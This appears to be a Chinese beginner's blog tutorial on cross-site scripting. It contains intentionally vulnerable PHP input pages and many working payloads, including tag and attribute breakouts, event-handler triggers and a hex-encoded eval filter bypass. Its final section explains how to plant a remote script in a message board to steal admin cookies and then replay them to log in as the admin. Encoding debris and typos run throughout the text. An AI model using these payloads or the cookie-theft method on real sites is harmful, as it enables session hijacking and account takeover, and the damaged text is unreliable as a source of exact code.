0×01 前言:
《xss攻擊手法》一開始在互聯(lián)網(wǎng)上資料并不多(都是現(xiàn)成的代碼����,沒有從基礎(chǔ)的開始)�����,直到刺的《白帽子講WEB安全》和cn4rry的《XSS跨站腳本攻擊剖析與防御》才開始好轉(zhuǎn)�。
我這里就不說什么xss的歷史什么東西了��,xss是一門又熱門又不太受重視的Web攻擊手法�����,為什么會(huì)這樣呢���,原因有下:
1����、耗時(shí)間
2�、有一定幾率不成功
3、沒有相應(yīng)的軟件來完成自動(dòng)化攻擊
4��、前期需要基本的html����、js功底,后期需要扎實(shí)的html�、js�����、actionscript2/3.0等語言的功底
5、是一種被動(dòng)的攻擊手法
6��、對(duì)website有http-only�、crossdomian.xml沒有用
但是這些并沒有影響黑客對(duì)此漏洞的偏愛,原因不需要多��,只需要一個(gè)����。
Xss幾乎每個(gè)網(wǎng)站都存在,google��、baidu�����、360等都存在�����。
0×02 原理:
首先我們現(xiàn)在本地搭建個(gè)PHP環(huán)境(可以使用phpstudy安裝包安裝)�,然后在index.php文件里寫入如下代碼:
- <html>
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
- <title>XSS原理重現(xiàn)</title>
- </head>
- <body>
- <form action="" method="get">
- <input type="text" name="xss_input">
- <input type="submit">
- </form>
- <hr>
- <?php
- $xss = $_GET['xss_input'];
- echo '你輸入的字符為<br>'.$xss;
- ?>
- </body>
- </html>
-
然后�����,你會(huì)在頁面看到這樣的頁面
我們?cè)囍斎隺bcd123�,得到的結(jié)果為
我們?cè)诳纯丛创a
我們輸入的字符串被原封不動(dòng)的輸出來了�����,那這里我們提出來一個(gè)假設(shè)�����,假設(shè)我們?cè)谒阉骺蜉斎胂旅娴拇a會(huì)出現(xiàn)什么呢�?
- <script>alert('xss')</script>
如果按照上面的例子來說,它應(yīng)該存在第12行的[br]與[/boby]>之間��,變成:
- <br><script>alert('xss')</script></boby>
之后��,應(yīng)該會(huì)彈出對(duì)話框����。
既然假設(shè)提出來,那我們來實(shí)現(xiàn)下這個(gè)假設(shè)成不成立吧���。
我們輸入
- <script>alert('xss')</script>
得到的頁面為
成功彈窗�,這個(gè)時(shí)候基本上就可以確定存在xss漏洞。
我們?cè)诳纯丛创a
看來���,我們的假設(shè)成功了��,這節(jié)就說說XSS的原理���,下面幾節(jié)說說xss的構(gòu)造和利用���。
0×03 xss利用輸出的環(huán)境來構(gòu)造代碼 :
上節(jié)說了xss的原理��,但是我們的輸出點(diǎn)不一在[ br ]和[ /boby ]里�,可以出現(xiàn)在html標(biāo)簽的屬性里��,或者其他標(biāo)簽里面�����。所以這節(jié)很重要�,因?yàn)椴灰欢?當(dāng)你輸入下面代碼就會(huì)出現(xiàn)彈窗。
- <script>alert('xss')</script>
先貼出代碼:
- <html>
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
- <title>XSS利用輸出的環(huán)境來構(gòu)造代碼</title>
- </head>
- <body>
- <center>
- <h6>把我們輸入的字符串 輸出到input里的value屬性里</h6>
- <form action="" method="get">
- <h6>請(qǐng)輸入你想顯現(xiàn)的字符串</h6>
- <input type="text" name="xss_input_value" value="輸入"><br>
- <input type="submit">
- </form>
- <hr>
- <?php
- $xss = $_GET['xss_input_value'];
- if(isset($xss)){
- echo '<input type="text" value="'.$xss.'">';
- }else{
- echo '<input type="type" value="輸出">';
- }
- ?>
- </center>
- </body>
- </html>
下面是代碼的頁面
這段代碼的作用是把第一個(gè)輸入框的字符串�����,輸出到第二個(gè)輸入框,我們輸入1���,那么第二個(gè)input里的value值就是1����,下面是頁面的截圖和源代碼的截圖(這里我輸入下面的代碼來測(cè)試)
- <script>alert('xss')</script>
明顯的可以看到�����,并沒有彈出對(duì)話框�����,大家可能會(huì)疑惑為什么沒有彈窗呢�����,我們來看看源代碼
我們看到我們輸入的字符串被輸出到第15行input標(biāo)簽里的value屬性里面��,被當(dāng)成value里的值來顯現(xiàn)出來�����,所以并沒有彈窗,這時(shí)候我們?cè)撛趺崔k呢����?聰明的人已經(jīng)發(fā)現(xiàn)了可以在
- <script>alert('xss')</script>
前面加個(gè)">來閉合input標(biāo)簽。所以應(yīng)該得到的結(jié)果為
成功彈窗了�,我們?cè)诳纯催@時(shí)的頁面
看到后面有第二個(gè)input輸入框后面跟有">字符串,為什么會(huì)這樣呢����,我們來看看源代碼
這時(shí)可以看到我們構(gòu)造的代碼里面有兩個(gè)">,第一個(gè)">是為了閉合input標(biāo)簽����,所以第二個(gè)">就被拋棄了��,因?yàn)閔tml的容錯(cuò)性高��,所以并沒有像php那樣出現(xiàn)錯(cuò)誤��,而是直接把多余的字符串來輸出了�����,有的人是個(gè)完美主義者��,不喜歡有多余的字符串被輸出,這時(shí)該怎么辦呢���?
這里我問大家一個(gè)問題����,我之前說的xss代碼里�����,為什么全是帶有標(biāo)簽的�����。難道就不能不帶標(biāo)簽么��?��!答:當(dāng)然可以�。既然可以不用標(biāo)簽,那我們就用標(biāo)簽里的屬性來構(gòu)造XSS��,這樣的話���,xss代碼又少����,又不會(huì)有多余的字符串被輸出來。
還是這個(gè)環(huán)境��,但是不能使用標(biāo)簽����,你應(yīng)該怎么做����。想想input里有什么屬性可以調(diào)用js,html學(xué)的好的人��,應(yīng)該知道了�����,on事件�,對(duì)的��。我們可以用on事件來進(jìn)行彈窗��,比如這個(gè)xss代碼 我們可以寫成
- " onclick="alert('xss')
這時(shí)��,我們?cè)趤碓囋嚕撁鏁?huì)發(fā)生什么樣的變化吧�����。
沒有看到彈窗啊�,失敗了么����?答案當(dāng)然是錯(cuò)誤的,因?yàn)閛nclick是鼠標(biāo)點(diǎn)擊事件�,也就是說當(dāng)你的鼠標(biāo)點(diǎn)擊第二個(gè)input輸入框的時(shí)候����,就會(huì)觸發(fā)onclick事件,然后執(zhí)行alert('xss')代碼��。我們來試試看
當(dāng)我點(diǎn)擊后,就出現(xiàn)了彈窗����,這時(shí)我們來看看源代碼吧
第15行,value值為空,當(dāng)鼠標(biāo)點(diǎn)擊時(shí)����,就會(huì)彈出對(duì)話框。這里可能就會(huì)有人問了,如果要點(diǎn)擊才會(huì)觸發(fā)����,那不是很麻煩么�,成功率不就又下降了么。我來幫你解答這個(gè)問題�����,on事件不止onclick這一個(gè)�,還有很多,如果你想不需要用戶完成什么動(dòng)作就可以觸發(fā)的話���,i可以把onclick改成
Onmousemove 當(dāng)鼠標(biāo)移動(dòng)就觸發(fā)
Onload 當(dāng)頁面加載完成后觸發(fā)
還有很多���,我這里就不一一說明了,有興趣的朋友可以自行查詢下�����。
別以為就這樣結(jié)束了,還有一類環(huán)境不能用上述的方法��,
那就是如果在[ textarea ]標(biāo)簽里呢�?!或者其他優(yōu)先級(jí)比script高的呢��?
就下面這樣
這時(shí)我們?cè)撛趺崔k呢����?既然前面都說了閉合屬性和閉合標(biāo)簽了,那能不能閉合完整的標(biāo)簽?zāi)?���,答案是肯定的。我們可以輸入下面的代碼就可以實(shí)現(xiàn)彈窗了��。
- </textarea><script>alert('xss')</script>
0×04 過濾的解決辦法
假如說網(wǎng)站禁止過濾了script 這時(shí)該怎么辦呢��,記住一句話�,這是我總結(jié)出來的“xss就是在頁面執(zhí)行你想要的js”不用管那么多,只要能運(yùn)行我們的js就OK���,比如用img標(biāo)簽或者a標(biāo)簽����。我們可以這樣寫
- <img scr=1 onerror=alert('xss')>當(dāng)找不到圖片名為1的文件時(shí),執(zhí)行alert('xss')
- <a href=javascrip:alert('xss')>s</a> 點(diǎn)擊s時(shí)運(yùn)行alert('xss')
- <iframe src=javascript:alert('xss');height=0 width=0 /><iframe>利用iframe的scr來彈窗
- <img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>過濾了alert來執(zhí)行彈窗
等等有很多的方法�,不要把思想總局限于一種上面,記住一句話“xss就是在頁面執(zhí)行你想要的js”其他的管他去�。(當(dāng)然有的時(shí)候還有管他…)
0×05 xss的利用
說了那么多,大家可能都以為xss就是彈窗�,其實(shí)錯(cuò)了,彈窗只是測(cè)試xss的存在性和使用性�。
這時(shí)我們要插入js代碼了,怎么插呢�����?
你可以這樣
- <script scr="js_url"></script>
也可以這樣
- <img src=x onerror=appendChild(createElement('script')).src='js_url' />
各種姿勢(shì)�,各種插�����,只要鞥運(yùn)行我們的js就OK�。那運(yùn)行我們的js有什么用呢?
Js可以干很多的事����,可以獲取cookies(對(duì)http-only沒用)、控制用戶的動(dòng)作(發(fā)帖��、私信什么的)等等。
比如我們?cè)诰W(wǎng)站的留言區(qū)輸入下面的代碼:
- <script scr="js_url"></script>
當(dāng)管理員進(jìn)后臺(tái)瀏覽留言的時(shí)候����,就會(huì)觸發(fā),然后管理員的cookies和后臺(tái)地址還有管理員瀏覽器版本等等你都可以獲取到了�����,再用“桂林老兵cookie欺騙工具”來更改你的cookies��,就可以不用輸入賬號(hào) 密碼 驗(yàn)證碼 就可以以管理員的方式來進(jìn)行登錄了��。
至于不會(huì)js的怎么寫js代碼呢��,放心網(wǎng)上有很多xss平臺(tái)����,百度一下就可以看到了。頁面是傻瓜式的操作�����,這里就不再過多的說明了���。
有興趣的朋友�,下面是cn4rry給我的幾個(gè)xss平臺(tái),大家可以自己鉆研與研究�,也可以自己搭建
http://pan.baidu.com/s/1ntqOp4X
在發(fā)布此文章的時(shí)候,我特地和cn4rry談了一下��,得到的結(jié)果是���,我會(huì)繼續(xù)寫這個(gè)系列的�����。當(dāng)我把這個(gè)doc發(fā)給cn4rry的時(shí)候�,他就直接來句“嗯 寫的比較基礎(chǔ)”�����,我本來的打算是寫一個(gè)xss入門的就可以了��,我只是感覺 現(xiàn)在網(wǎng)上的文章從簡(jiǎn)單開始介紹xss的比較少��,都是在書里有
所以 我想在網(wǎng)上把他講的細(xì)點(diǎn) xss入門就可以了����,后面的路 就可以自己摸索了
但是和他談過后��,感覺還是要繼續(xù)寫下去,因?yàn)椤皒ss盲打”“xss編碼繞過”“fuzzing xss”等等����,如果是自己慢慢琢磨的話,需要較長(zhǎng)的時(shí)間���,所以我打算每過一段時(shí)間就會(huì)推出下一個(gè)xss的文章��,寫個(gè)系列出來����。
